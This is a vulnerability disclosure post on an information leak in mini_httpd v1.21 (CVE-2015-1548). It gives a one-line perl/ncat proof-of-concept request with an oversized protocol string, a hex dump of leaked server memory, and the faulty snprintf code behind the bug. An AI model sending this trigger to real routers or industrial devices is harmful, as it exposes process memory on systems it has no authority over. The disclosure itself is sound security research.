( en hu )

# mini_httpd v1.21 information disclosure

Peter Kasza

## A small webserver for your devices

mini_httpd is a small webserver which is used mostly in embedded environments like routers, modems and industrial control devices. The most prevalent version on the internet is based on mini_httpd/1.19 19dec2003. The webserver usually contains vendor specific patches.

### Information disclosure

The webserver contains an information disclosure vulnerability. An attacker can specify a long enough protocol string to reveal parts of the processes memory. The vulnerability affects v1.21 and earlier.

Triggering the bug

 1 perl -e 'print "GET / " . "X"x65536 . "/Y" . "\r\n\r\n"' | ncat localhost 80 

Response from the server

 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 00000000 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 |XXXXXXXXXXXXXXXX| * 00002700 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 |XXXXXXXXXXXXXXX.| 00002710 90 60 1f 95 ff 7f 00 00 d0 5f 1f 95 ff 7f 00 00 |........_......| 00002720 00 00 00 00 00 00 00 00 10 87 d8 1b b1 7f 00 00 |................| 00002730 60 00 00 00 00 00 00 00 98 89 40 00 00 00 00 00 |[email protected]| 00002740 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00002750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00002790 00 0c 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................| 000027a0 04 00 00 00 00 00 00 00 23 85 40 00 00 00 00 00 |........#[email protected]| 000027b0 30 00 00 00 00 00 00 00 34 00 00 00 00 00 00 00 |0.......4.......| 000027c0 03 00 00 00 00 00 00 00 2d 4a 40 00 00 00 00 00 |[email protected]| 000027d0 8d 0c 85 42 00 00 00 00 a1 49 40 00 00 00 00 00 |[email protected]| 000027e0 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 |................| 000027f0 00 00 00 00 00 00 00 00 50 01 20 95 ff 7f 00 00 |........P. .....| 00002800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00009d30 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 |text/html; chars| 00009d40 65 74 3d 55 54 46 2d 38 00 00 00 00 00 00 00 00 |et=UTF-8........| 00009d50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 0000a130 2e 00 69 6e 64 65 78 2e 68 74 6d 6c 00 00 00 00 |..index.html....| 0000a140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 0000c840 40 2e 61 00 00 00 00 00 80 76 20 95 ff 7f 00 00 |@.a......v .....| 0000c850 b0 76 20 95 ff 7f 00 00 58 6e 36 02 00 00 00 00 |.v .....Xn6.....| 0000c860 57 89 40 00 00 00 00 00 ff 7f 00 00 00 00 00 00 |[email protected]| 0000c870 00 00 00 00 00 00 00 00 35 57 40 00 00 00 00 00 |[email protected]| 0000c880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 0000c8a0 2e 2f 69 6e 64 65 78 2e 68 74 6d 6c 00 00 00 00 |./index.html....| 0000c8b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00010000 00 00 00 00 00 00 00 00 00 00 00 53 65 72 76 65 |...........Serve| 00010010 72 3a 20 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e |r: mini_httpd/1.| 00010020 32 31 20 31 38 6f 63 74 32 30 31 34 0d 0a 44 61 |21 18oct2014..Da| 00010030 74 65 3a 20 46 72 69 2c 20 32 33 20 4a 61 6e 20 |te: Fri, 23 Jan | 00010040 32 30 31 35 20 31 31 3a 34 37 3a 35 31 20 47 4d |2015 11:47:51 GM| 00010050 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |T..Content-Type:| 00010060 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 | text/html; char| 00010070 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 |set=UTF-8..Conte| 00010080 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 36 0d 0a |nt-Length: 326..| 00010090 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 |Last-Modified: F| 000100a0 72 69 2c 20 31 33 20 4d 61 79 20 32 30 30 35 20 |ri, 13 May 2005 | 000100b0 32 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 43 6f |20:22:37 GMT..Co| 000100c0 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d |nnection: close.| 

### Source of the bug

The vulnerability occurs because the server incorrectly calculates the size of the response. The snprintf function returns the number of bytes needed to store the message if the buffer size is too small, instead of returning the number of bytes that were actually written. mini_httpd blindly trusts the size returned by snprintf and it will return a chunk of memory past the buffer, when the protocol string is longer than 10000 bytes.

 1 2 3 4 5 6 7 // mini_httpd.c:2500 static void add_headers(...) { char buf[10000]; ... buflen = snprintf( buf, sizeof(buf), "%s %d %s\015\012", protocol, status, title ); add_to_response( buf, buflen ); } 

Edit: MITRE assigned the following CVE number for the issue: CVE-2015-1548